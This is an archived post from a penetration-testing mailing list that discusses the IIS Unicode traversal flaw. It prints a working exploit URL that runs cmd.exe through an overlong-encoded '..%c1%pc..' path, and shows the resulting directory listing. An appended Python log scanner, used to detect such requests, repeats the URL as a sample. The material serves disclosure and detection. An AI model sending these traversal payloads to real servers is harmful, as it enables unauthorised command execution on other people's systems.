Penetration Testing mailing list archives

Re: [PEN-TEST] IIS UNICODE Strings


From: Mike Ahern <mc_ahern () YAHOO COM>
Date: Tue, 31 Oct 2000 15:13:31 -0800

Vitaly Osipov [vos () TELENOR CZ] wrote:
Hmm... I see some *very* strange strings in your
examples below... the second escaped symbol (%pc for
example) is not real escaped hex-code - if it works,
then the problem is not in Unicode at all, but in
something else
---------------------------


Trust Me, It Works!!! Which is interesting since at
least one system reported as patched appears to be
still vulnerable. I had assumed the admin either
didn't patch, or used the wrong hotfix. Perhaps that
is not the case...

The Proof is in the Pudding:
----------------------------

http://10.X.X.X/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\
 Directory of c:\

06/23/00  01:38p                     0 AUTOEXEC.BAT
06/23/00  01:38p                     0 CONFIG.SYS
06/23/00  01:40p        <DIR>          Dell
06/26/00  03:29p        <DIR>          INetPub
06/26/00  02:10p        <DIR>          MSSQL7
06/26/00  01:40p        <DIR>          Multimedia Files
06/26/00  03:14p        <DIR>          My Installations
06/27/00  01:05p        <DIR>          Program Files
06/30/00  09:00a        <DIR>          TEMP
07/10/00  11:42a        <DIR>          WINNT


 -mch
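
Added example, not part of the original post: a log check for the two oddities discussed in this thread, a percent sign not followed by two hex digits (the %pc case) and a decoded 0xC0/0xC1 byte, which can never begin valid UTF-8. The log layout, sample lines and function names are assumptions made for the illustration.

```python
import string

def decode_escapes(path):
    """Percent-decode path; return (raw_bytes, malformed_escape_seen)."""
    raw, malformed, i = bytearray(), False, 0
    while i < len(path):
        pair = path[i + 1:i + 3]
        if path[i] == "%" and len(pair) == 2 and all(c in string.hexdigits for c in pair):
            raw.append(int(pair, 16))
            i += 3
            continue
        if path[i] == "%":
            malformed = True  # '%' not followed by two hex digits, e.g. %pc
        raw.extend(path[i].encode("utf-8"))
        i += 1
    return bytes(raw), malformed

def classify(uri):
    """Return the sorted reasons a request URI's path looks abnormal."""
    raw, malformed = decode_escapes(uri.split("?", 1)[0])
    reasons = set()
    if malformed:
        reasons.add("malformed-escape")
    # 0xC0/0xC1 can only begin an overlong two-byte sequence; never valid UTF-8.
    if 0xC0 in raw or 0xC1 in raw:
        reasons.add("overlong-utf8-lead")
    try:
        raw.decode("utf-8")
    except UnicodeDecodeError:
        reasons.add("invalid-utf8")
    if b".." in raw:
        reasons.add("dot-dot")  # heuristic: also matches names like a..b
    return sorted(reasons)

# Constructed log lines in a simplified "client method uri status" layout.
SAMPLE_LOG = [
    "192.0.2.10 GET /index.html 200",
    "192.0.2.11 GET /docs/r%C3%A9sum%C3%A9.pdf 200",
    "192.0.2.12 GET /sale/100%off 404",
    "192.0.2.13 GET /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\\ 200",
]

def scan(lines):
    """Return (uri, reasons) for every line whose URI is flagged."""
    hits = [(line.split()[2], classify(line.split()[2])) for line in lines]
    return [(uri, reasons) for uri, reasons in hits if reasons]

if __name__ == "__main__":
    for uri, reasons in scan(SAMPLE_LOG):
        print(uri, "->", ", ".join(reasons))
```

A lone malformed escape such as "100%off" is usually a typo in a link; the combination of a malformed escape, a 0xC0/0xC1 byte and a dot-dot segment in one request is the pattern worth alerting on.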




